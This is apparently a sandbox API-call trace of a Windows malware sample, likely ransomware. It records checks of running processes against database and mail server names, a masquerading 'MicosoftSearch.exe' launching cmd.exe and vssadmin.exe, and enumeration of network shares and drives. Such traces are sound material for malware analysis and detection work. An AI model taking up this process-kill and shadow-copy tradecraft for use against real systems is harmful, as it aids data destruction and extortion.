[0056.549] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0056.549] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0056.549] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0056.549] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0056.549] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0056.549] lstrlenW (lpString="wininit.exe") returned 11 [0056.549] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0056.549] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0056.550] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0056.550] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.550] lstrlenW (lpString="csrss.exe") returned 9 [0056.551] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0056.551] lstrlenW (lpString="winlogon.exe") returned 12 [0056.551] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0056.552] lstrlenW (lpString="services.exe") returned 12 [0056.552] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0056.553] lstrlenW (lpString="lsass.exe") returned 9 [0056.553] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0056.554] lstrlenW (lpString="lsm.exe") returned 7 [0056.554] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.555] lstrlenW (lpString="svchost.exe") returned 11 [0056.555] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.555] lstrlenW (lpString="svchost.exe") returned 11 [0056.555] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.556] lstrlenW (lpString="svchost.exe") returned 11 [0056.556] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.557] lstrlenW (lpString="svchost.exe") returned 11 [0056.557] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.558] lstrlenW (lpString="svchost.exe") returned 11 [0056.558] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0056.559] lstrlenW (lpString="audiodg.exe") returned 11 [0056.559] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.559] lstrlenW (lpString="svchost.exe") returned 11 [0056.560] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.560] lstrlenW (lpString="svchost.exe") returned 11 [0056.560] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0056.561] lstrlenW (lpString="dwm.exe") returned 7 [0056.561] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0056.562] lstrlenW (lpString="explorer.exe") returned 12 [0056.562] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0056.563] lstrlenW (lpString="spoolsv.exe") returned 11 [0056.563] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0056.564] lstrlenW (lpString="taskhost.exe") returned 12 [0056.564] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.565] lstrlenW (lpString="svchost.exe") returned 11 [0056.565] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0056.566] lstrlenW (lpString="taskeng.exe") returned 11 [0056.566] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0056.567] lstrlenW (lpString="taskhost.exe") returned 12 [0056.567] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0056.945] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0056.954] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0056.984] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0056.985] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0056.986] lstrlenW (lpString="sa_shape.exe") returned 12 [0056.986] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0056.986] lstrlenW (lpString="confidence.exe") returned 14 [0056.987] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0056.987] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0056.987] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0056.988] lstrlenW (lpString="blue.exe") returned 8 [0056.988] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0056.989] lstrlenW (lpString="newly debut.exe") returned 15 [0056.989] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0056.990] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0056.990] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0056.991] lstrlenW (lpString="archive.exe") returned 11 [0056.991] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0056.992] lstrlenW (lpString="defend.exe") returned 10 [0056.992] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0056.993] lstrlenW (lpString="arservice.exe") returned 13 [0056.993] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0056.994] lstrlenW (lpString="rr-programmer.exe") returned 17 [0056.994] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0056.994] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0056.995] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0056.995] lstrlenW (lpString="twistedmonton.exe") returned 17 [0056.995] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0056.996] lstrlenW (lpString="arc plains.exe") returned 14 [0056.996] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0056.997] lstrlenW (lpString="americahousestip.exe") returned 20 [0056.997] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0056.998] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0056.998] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0056.999] lstrlenW (lpString="medical lectures.exe") returned 20 [0056.999] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0056.999] lstrlenW (lpString="electronic.exe") returned 14 [0057.000] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0057.000] lstrlenW (lpString="regression.exe") returned 14 [0057.000] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0057.001] lstrlenW (lpString="county.exe") returned 10 [0057.001] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0057.002] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0057.002] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0057.003] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0057.003] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0057.004] lstrlenW (lpString="cmd.exe") returned 7 [0057.004] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0057.005] lstrlenW (lpString="conhost.exe") returned 11 [0057.005] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0057.006] lstrlenW (lpString="vssadmin.exe") returned 12 [0057.006] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0057.007] lstrlenW (lpString="VSSVC.exe") returned 9 [0057.007] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.007] lstrlenW (lpString="svchost.exe") returned 11 [0057.008] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b0, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0057.008] lstrlenW (lpString="LogonUI.exe") returned 11 [0057.008] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b0, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0057.009] CloseHandle (hObject=0x230) returned 1 [0057.009] Sleep (dwMilliseconds=0x1f4) Thread: id = 5 os_tid = 0x974 [0032.192] WaitForSingleObject (hHandle=0x18fd50, dwMilliseconds=0xffffffff) returned 0xffffffff [0032.192] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb8e2b8 | out: hHeap=0xb10000) returned 1 Thread: id = 6 os_tid = 0x978 [0032.193] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xb8e2b8 [0032.193] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8e2b8, Size=0x20) returned 0xb8ff50 [0032.193] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xb8ff50, Size=0x40) returned 0xb7d3d0 [0032.193] GetLogicalDrives () returned 0x4 [0032.193] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0xbd7fe8 [0032.829] GetComputerNameW (in: lpBuffer=0xbd7fec, nSize=0x2a2ff6c | out: lpBuffer="XDUWTFONO", nSize=0x2a2ff6c) returned 1 [0032.829] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x1000) returned 0xba4bf0 [0032.830] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x2a2ff3c | out: lphEnum=0x2a2ff3c*=0xb8f350) returned 0x0 [0032.830] WNetEnumResourceW (in: hEnum=0xb8f350, lpcCount=0x2a2ff38, lpBuffer=0xba4bf0, lpBufferSize=0x2a2ff40 | out: lpcCount=0x2a2ff38, lpBuffer=0xba4bf0, lpBufferSize=0x2a2ff40) returned 0x103 [0032.830] WNetCloseEnum (hEnum=0xb8f350) returned 0x0 [0032.830] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x2a2ff3c | out: lphEnum=0x2a2ff3c*=0xbf8848) returned 0x0 [0034.921] WNetEnumResourceW (in: hEnum=0xbf8848, lpcCount=0x2a2ff38, lpBuffer=0xba4bf0, lpBufferSize=0x2a2ff40 | out: lpcCount=0x2a2ff38, lpBuffer=0xba4bf0, lpBufferSize=0x2a2ff40) returned 0x0 [0034.921] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x1000) returned 0x4230078 [0034.921] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xba4bf0, lphEnum=0x2a2ff10 | out: lphEnum=0x2a2ff10*=0xb8f5f0) returned 0x0 [0034.996] WNetEnumResourceW (in: hEnum=0xb8f5f0, lpcCount=0x2a2ff0c, lpBuffer=0x4230078, lpBufferSize=0x2a2ff14 | out: lpcCount=0x2a2ff0c, lpBuffer=0x4230078, lpBufferSize=0x2a2ff14) returned 0x103 [0034.996] WNetCloseEnum (hEnum=0xb8f5f0) returned 0x0 [0034.996] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x1000) returned 0xbc9ca0 [0034.996] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xba4c10, lphEnum=0x2a2ff10 | out: lphEnum=0x2a2ff10*=0x0) returned 0x4b8 [0056.212] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x1000) returned 0x431d9d8 [0056.212] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xba4c30, lphEnum=0x2a2ff10 | out: lphEnum=0x2a2ff10*=0x0) returned 0x4c6 [0056.244] WNetEnumResourceW (in: hEnum=0xbf8848, lpcCount=0x2a2ff38, lpBuffer=0xba4bf0, lpBufferSize=0x2a2ff40 | out: lpcCount=0x2a2ff38, lpBuffer=0xba4bf0, lpBufferSize=0x2a2ff40) returned 0x103 [0056.244] WNetCloseEnum (hEnum=0xbf8848) returned 0x0 [0056.244] GetLogicalDrives () returned 0x4 [0056.244] Sleep (dwMilliseconds=0x64) [0056.634] GetLogicalDrives () returned 0x4 [0056.635] Sleep (dwMilliseconds=0x64) [0057.010] GetLogicalDrives () returned 0x4 [0057.010] Sleep (dwMilliseconds=0x64) [0057.183] GetLogicalDrives () returned 0x4 [0057.183] Sleep (dwMilliseconds=0x64) Thread: id = 7 os_tid = 0x97c [0033.550] GetTickCount () returned 0x18c47 [0033.550] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x24) returned 0xba8438 [0033.550] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba8438, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x110 [0033.551] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba8438, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0033.551] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba8438, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12c [0033.552] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba8438, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x130 [0033.553] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7e88 [0033.553] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba7e88, Size=0x20) returned 0xb90158 [0033.553] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7e88 [0033.553] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba7e88, Size=0x20) returned 0xb90180 [0033.553] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.553] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.553] Wow64DisableWow64FsRedirection (in: OldValue=0x292ff84 | out: OldValue=0x292ff84*=0x0) returned 1 [0033.553] lstrlenW (lpString="kernel32.dll") returned 12 [0033.553] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90158 | out: hHeap=0xb10000) returned 1 [0033.553] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.553] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90180 | out: hHeap=0xb10000) returned 1 [0033.553] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0xb93b90, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0033.554] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0033.893] GetTickCount () returned 0x18cf3 [0033.893] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0034.548] GetTickCount () returned 0x18d9e [0034.548] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0034.775] GetTickCount () returned 0x18e79 [0034.775] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0034.924] GetTickCount () returned 0x18f05 [0034.924] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0035.321] GetTickCount () returned 0x1906c [0035.321] GetTickCount () returned 0x1906c [0035.321] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0035.495] GetTickCount () returned 0x19117 [0035.495] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0035.857] GetTickCount () returned 0x1925f [0035.857] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0036.203] GetTickCount () returned 0x193b6 [0036.203] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0036.477] GetTickCount () returned 0x194cf [0036.477] GetTickCount () 